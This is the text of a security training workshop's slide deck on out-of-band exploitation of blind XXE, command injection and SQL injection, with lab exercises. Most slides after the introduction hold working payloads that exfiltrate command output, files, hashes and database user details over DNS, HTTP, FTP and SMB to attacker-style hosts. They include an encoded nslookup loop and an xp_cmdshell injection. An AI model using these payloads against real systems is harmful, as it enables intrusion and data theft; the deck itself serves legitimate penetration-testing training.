© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved. Out-of-Band Exploitation for Asynchronous Vulnerabilities SSID: OOB1 or OOB2 Password: Out0fB@nd2020
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Out-of-Band Exploitation for Asynchronous Vulnerabilities
SSID: OOB1 or OOB2
Password: Out0fB@nd2020
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
About NotSoSecure
• Web Application Security Assessment
• Infrastructure Security Assessment
• Mobile Application Security Assessment
• Source Code Review
• IoT Security Assessment
• Red Team Exercises
● Beginner Friendly○ Hacking 101○ Basic Infrastructure Hacking○ Basic Web Hacking
● Advanced/Specialist Offensive Courses○ Advanced Infrastructure Hacking○ Advanced Web Hacking○ Hacking and Securing Cloud
● Specialist Defensive Courses○ Application Security for Developers○ DevSecOps
Training
For private/corporate training please contact us at [email protected]
Penetration Testing
IT security specialist company providing cutting-edge IT security consultancy and training.
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Speakers
Ajay Prashar
• Senior Security Consultant @ NotSoSecure
• 4+ Years of experience
• Research published in Top Ten Hacking Techniques of 2018 by
Portswigger and Exploit Database (@ExploitDB)
• Researcher and vulnerable app developer @Notsosecure.
• Connect : @tricksiused
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Speakers
Ashwin Pathak
• Senior Security Consultant @NotSoSecure
• Certification : OSCP
• 6.5 Years of experience
• Expertise in Web/Cloud/Network.
• Researcher and vulnerable app developer @Notsosecure.
• Passionate about make and break.
• Connect @AshwinPathak26
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
What will we be Looking at ?
• Introduction to Out-of-Band (OOB)
• Tools for the Trade
• Understanding DNS and its Limitation
• XML External Entity (XXE) Attack
• Command Injection
• SQL Injection
• Final Challenge
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Lab Setup
● Please visit the google doc link below and follow the instructions.
○ http://bit.ly/NSS-OOB
○ http://null.oob.lab/setup.pdf
● Targets:
○ https://null.oob.lab
○ https://null.oob.lab:3001
○ https://null.oob.lab:3002
○ https://null.oob.lab:3003
○ https://null.oob.lab:3004
○ https://null.oob.lab:3006
SSID: OOB1 or OOB2
Password: Out0fB@nd2020
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
10.1.2.100
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Any abuse of network privileges beyond the stated aims will result in
immediate disqualification from the workshop. Actions that may result
in disqualification are:
○ Any activity causing a Denial of service (DoS)
○ System shutdown
○ Interference in other delegates’ work etc.
Delegate agreement
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
What?
When?
Why?
How?OOB
Introduction
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
What
• Exploitation/Detection channels are different.
When
• A blind vulnerability is the one in which an attacker doesn't get any
output to the malicious activities performed by them.
Why
• Time Based attack are time consuming.
• Out of Band are quick and stealthy.
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Tools for the Trade
• Netcat
• Tcpdump
• Web Servers (Python SimpleHTTP)
• FTP Servers
• Wireshark
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Netcat
• Netcat is a computer networking tool or utility for reading from and
writing to network connections using TCP or UDP.
• It has the ability to make various kinds of connections, it is a easy-
to-use and efficient network debugging and exploration tool.
• Netcat can work like a client as well as a server.
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Tcpdump/Windump
• Command-line packet analyzer.
• Capture & display TCP/UDP/IP packets.
• It can read packets from a network interface card or from a
previously created saved packet file and can also write packets to
standard output or a file
• We will use for Monitoring DNS traffic in our Lab
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Python SimpleHTTPServer
• A simple python server.
• A web server that enables GET and POST requests.
• Can be efficiently used for OOB request over http protocol.
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Protocols to Leverage OOB Calls
TCP is a connection-oriented protocol, which
means a connection is established and
maintained until the application programs at
each end have finished exchanging
messages
TCP
● HTTP
● FTP
● SMB .etc.
UDP (User Datagram Protocol) is an
alternative communications protocol to
TCP used primarily for establishing low-
latency and loss-tolerating connections
between applications on the internet.
UDP
● DNS
ICMP is used by routers, intermediary
devices or hosts to communicate error
information or updates to other routers,
intermediary devices or hosts.
ICMP
● PING Utility
Reference: https://searchnetworking.techtarget.com
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Why DNS for OOB ?
• Egress Hardened Firewalls block default protocols like http, ftp etc.
• Difficult to validate a blind injection in presence of such protections.
• Any communication generally starts with a DNS resolution, from a
FQDN, So it is required everywhere and is less monitored.
• Hard for corporation to function if rules are put on DNS.
• Good channel for data exfiltration as companies tend to go easy on
DNS communication.
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
DNS Limitations
● A domain name can have maximum of 127 subdomains.
● Each subdomains can have maximum of 63 character length.
● Maximum length of full domain name is 253 characters.
● Due to DNS records caching, unique values are required in domain names
for each request.
● DNS being plaintext channel, any data extracted over DNS will be in
cleartext format and will be available to intermediary nodes and DNS Server
caches. Hence, it is recommended not to exfiltrate sensitive data over DNS.
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
XML External Entity (XXE) Basics
• XXE attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser, leading to sensitive data exposure, situation of DoS, Server-side Request Forgery (SSRF), port scanning etc.
• Blind, in certain cases the XML external entities are being processed on the server-side, yet they don’t reveal any information in the response to confirm the execution of XXE.
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Blind XXE Detection
• For OOB detection an attacker can craft payloads which can generate requests for external entity.
• Before any communication starts to fetch external entity, DNS resolution will take place.
• Sample Protocols/Payload• HTTP : <!ENTITY test SYSTEM 'ldap://oob.dnsattacker.com:port'>
• SMB: <!ENTITY test SYSTEM '\\notsosecure.com\abc.txt'>
• Gopher: <!ENTITY test SYSTEM 'gopher://oob.dnsattacker.com:port/%data%'>
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Exercise - XXE : DNS for Detection
• Identify the XML External Entity vulnerability by making the host send DNS requests to an external host.
Challenge URL: http://null.oob.lab
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
XXE Exploitation over HTTP Channel
• For OOB exploitation on HTTP channel, an attacker can craft
payloads which contain requests for externally hosted Document
Type Declaration (DTD), which can be used for exploiting this
vulnerability.
• What is DTD?
• It defines the valid building blocks of an XML document
• It defines the structure of a document using a list of validated
elements and attributes
• A DTD can be declared in various ways - inline inside an XML
document, or as an external reference
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
DEMO- XXE : HTTP for Exploitation [Windows/Linux]
• Exploit the XML External Entity vulnerability to make the host send HTTP requests to an external web server containing contents of ‘/etc/passwd’ file.
Challenge URL: http://null.oob.lab
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
XXE Exploitation over HTTP+FTP Channel
• HTTP breaks for
• an invalid character, such as #
• or when the URL length is exceeded.
• How this works?
• Vulnerable XML app loads external malicious DTD schema via
HTTP request to a webserver, performs operation and makes an
external entity request via FTP from ftp://host:port/%data;
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Exercise - XXE : FTP for Exfiltration
• Exploit the XML External Entity vulnerability to extract contents of ‘C:/Windows/win.ini’ file using combination of HTTP and FTP.
Challenge URL: http://null.oob.lab
Reference https://github.com/staaldraad/xxeserv
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Stealing Hashes?
• SMB protocol : shared access to files, printers, and serial ports between nodes on a network
• SMB in XXE:• SMB: <!ENTITY test SYSTEM '\\notsosecure.com\abc.txt'>
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
CVE 2018-0878
• Microsoft Windows Remote Assistance -
XML External Entity Injection:
https://krbtgt.pw/windows-remote-
assistance-xxe-vulnerability
• An information disclosure vulnerability
exists when Windows Remote Assistance
incorrectly processes XML External Entities
(XXE).
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Command/Code Injection
• Execution of arbitrary commands or code on the host system.
• Blind Injection ?• Blind vulnerabilities do not return the output from the command within its
HTTP response.
• How to detect?• Injected command can be used to create an out-of-band network
interaction with a system controlled by us.
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Example: An attacker can craft payloads which can generate DNS queries via Command Injection.
• Sample Payload• nslookup test.oob.dnsattacker.com or dig test.oob.dnsattacker.com
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Exercise - DNS for Exploitation
• Extract the output for the command ‘hostname’ over DNS Queries.
Challenge URL: http://null.oob.lab:3006
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
For Large Outputs and Files
1.Encoding
Encode the command
output so that it can be
transferred over DNS
channel without breaking
the DNS queries syntax.
(Data handling)
2.Dividing
Breaking the output to
relevant subdomain
sizes suitable for DNS
queries.
3.Sending
Sending divided output
on DNS channel by
performing DNS queries.
4.Reconstructing
Reconstructing the
output by collecting,
rearranging and
decoding DNS queries.
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Exercise - DNS for exploitation
• Extract the output for the command ‘ver’ over DNS Queries.
• Windows• Challenge URL: http://null.oob.lab:3006
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
The Magic Payload
cmd /v /c "ver > output && certutil -encodehex -f output output.hex 4 &&
powershell $text=Get-Content output.hex;$subdomain=$text.replace('
','');$j=11111;foreach($i in $subdomain){
$final=$j.tostring()+'.'+$i+'.live.null.oob.lab';$j += 1; nslookup $final
}"
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
• Dissecting the command• ver > output && certutil -encodehex -f output output.hex 4
• powershell $text=Get-Content output.hex;$subdomain=$text.replace(' ','');
• $j=11111;foreach($i in $subdomain){
$final=$j.tostring()+'.'+$i+'.live.null.oob.lab';$j += 1; nslookup $final }
• cmd /v /c
• Linux Version• var=11111 && for i in $(ifconfig|base64|awk '{gsub(/.{50}/,"&\n")}1'); do
var=$((var+1)) && nslookup $var.$i.file.oob.dnsattacker.com; done#
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Exploitation over other channels
● Command output can also be appended to the HTTP requests○ In HTTP Request Headers, Query Parameters etc.
● Some Native utilities to create web request:○ Windows: Powershell, Mshta, Certutil.exe
○ Linux: wget, curl
● Command Output via ICMP channel (Ping)
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
• SQLi vulnerabilities arise when user supplied data becomes part of SQL queries in an unsafe manner.
• In certain cases the applications even though vulnerable to SQL injection don’t reveal much information in the application response.
• In such cases inbuilt SQL functions can be used to confirm and then exploit the vulnerability.
SQL Injection
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
MariaDB(MySQL)
Some of the functions to produce out-of-band calls are as follows:● OUTFILE
○ SELECT 'a' INTO OUTFILE '\\\\aaaa.null.oob.lab\\foo$';
● LOAD_FILE
○ SELECT LOAD_FILE(CONCAT('\\\\', (SELECT
HEX(CONCAT(user(),"\n"))), '.null.oob.lab\\test.txt'));
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Exercise - DNS for (MariaDB)MYSQL
• Identify the SQL Injection vulnerability to make the host send DNS requests to an external host.
Challenge URL: http://null.oob.lab:3003
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
MSSQL
In MSSQL an attacker can use following functions to create Out-of-Band calls:
• BULK INSERT
BULK INSERT employees FROM "\\aaa.ashwin.sos.notsosecure.com\foo$";
• xp_dirtree
DECLARE @data varchar(1024); SELECT @data = (SELECT system_user); EXEC('master..xp_dirtree"\\'+@data+'.ashwin.sos.notsosecure.com\foo$"');
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Demo - : DNS for MSSQL
• Identify the SQL Injection vulnerability to make the host send DNS requests to an external host.
Challenge URL: http://null.oob.lab:3002
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Misconfigured Oracle
Some methods to create DNS queries are :• UTL_HTTP
SELECT utl_http.request('http://aaa.ashwin.sos.notsosecure.com/') FROM
dual;
• DBMS_LDAP
SELECT DBMS_LDAP.INIT((SELECT version FROM
v$instance)||'.attacker.com',80) FROM dual;
• XXE in Oracle 11g
select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-
8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM
"http://cccc.ashwin.sos.notsosecure.com/test"> %remote; >'),'/l') from dual
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Exercise - DNS for Oracle
• Identify the SQL Injection vulnerability to make the host send DNS requests to an external host.
Challenge URL: http://null.oob.lab:3001
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
PostgreSQL
In case of Postgresql, the following functions can be used to create Out-of-band calls:
• dblink_connect
CREATE EXTENSION dblink; SELECT dblink_connect('host=c444444.ashwin.sos.notsosecure.com user=postgres password=password dbname=pg_sitepoint');
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Demo - : DNS for PostgreSQL
• Identify the SQL Injection vulnerability to make the host send DNS requests to an external host.
Challenge URL: http://null.oob.lab:3004
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Tips for Final Challenge
• You can use the command injection payload used earlier with some more additional changes to make it suitable for SQL injection.
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Final Challenge : Exfiltrate Large command Output via DNS
• Use the SQL Injection vulnerability to exfiltrate command output of ‘ipconfig/ifconfig’ to an external host using DNS queries.
Challenge URL: http://null.oob.lab:3002
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
'; exec master..xp_cmdshell 'cmd /v /c "ipconfig > output && certutil -encodehex -f output
output.hex 4 && powershell $text=Get-Content output.hex;$subdomain=$text.replace('
','');$j=11111;foreach($i in $subdomain){
$final=$j.tostring()+'.'+$i+'.live.null.oob.lab';$j += 1; nslookup $final }" ‘ --
Sample Command : https://www.notsosecure.com/oob-exploitation-cheatsheet/
egrep -o '[0-9]{5}+\.+[0-9a-fA-F]{0,62}' file.txt|sort -u|cut -d. -f2|xxd -r -p
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
• Dissecting the command• ipconfig > output && certutil -encodehex -f output output.hex 4
• powershell $text=Get-Content output.hex;$subdomain=$text.replace('
','');$j=11111;foreach($i in $subdomain){
$final=$j.tostring()+'.'+$i+'.live.null.oob.lab';$j += 1; nslookup $final }
• Encoding the above command to powershell specific base64 ()
• cmd /v /c
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Burp Suite Collaborator
● A network service which helps to discover Blind vulnerabilities such as SQL Injection, XXE Attack, Cross-Site Scripting etc.
● Uses a specially crafted dedicated domain name and reports as an issue such as External Service Interaction, SQL Injection etc.
Reference : https://portswigger.net/burp/documentation/collaborator
• Web Alternative: swin.es/o
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Making Sockets Public
• NGROK• CLOUD VM instances:• SSH port forwarding• Dynamic-dns and Port forwarding
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Case Studies
NotSoSecure:
• Blind RCE due to Java Deserialization vulnerability.• Path Traversal to Blind Remote Code Execution using Blacklist3r and
YSoSerial.NET
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Key Workshop Takeaways
• There are multiple ways and techniques a user can write/form the
payload/setup for OOB.
• Why DNS can be your go to technique?
• Tools and techniques for basic to advanced setup.
© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Thank You
END PRESENTATION